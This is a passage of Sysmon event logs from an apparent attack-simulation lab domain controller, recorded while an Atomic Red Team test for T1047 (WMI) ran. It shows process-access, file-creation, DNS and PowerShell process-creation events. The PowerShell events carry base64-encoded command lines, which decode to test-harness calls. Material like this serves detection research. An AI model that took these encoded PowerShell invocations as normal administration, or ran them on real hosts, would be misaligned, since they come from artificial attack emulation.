C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5624,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5625,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-0010EC050900}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-0010EC050900}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5626,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:20.081\r\nProcessGuid: {41C8662E-20D7-5F25-0000-001050020900}\r\nProcessId: 4800\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\lgro13a1.dll\r\nCreationUtcTime: 2020-08-01 07:59:19.971","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:20.081","ProcessGuid":"{41C8662E-20D7-5F25-0000-001050020900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\lgro13a1.dll","CreationUtcTime":"2020-08-01 07:59:19.971","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5627,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.112\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.112","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5628,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.128\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.128","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5629,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.128\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.128","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5630,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.043\r\nProcessGuid: {41C8662E-20D1-5F25-0000-001016430800}\r\nProcessId: 4288\r\nQueryName: WIN-DC-6178966\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.043","ProcessGuid":"{41C8662E-20D1-5F25-0000-001016430800}","QueryName":"WIN-DC-6178966","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5631,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.304\r\nProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nProcessId: 1052\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20D7-5F25-0000-001081F10800}\r\nParentProcessId: 3496\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.304","ProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand 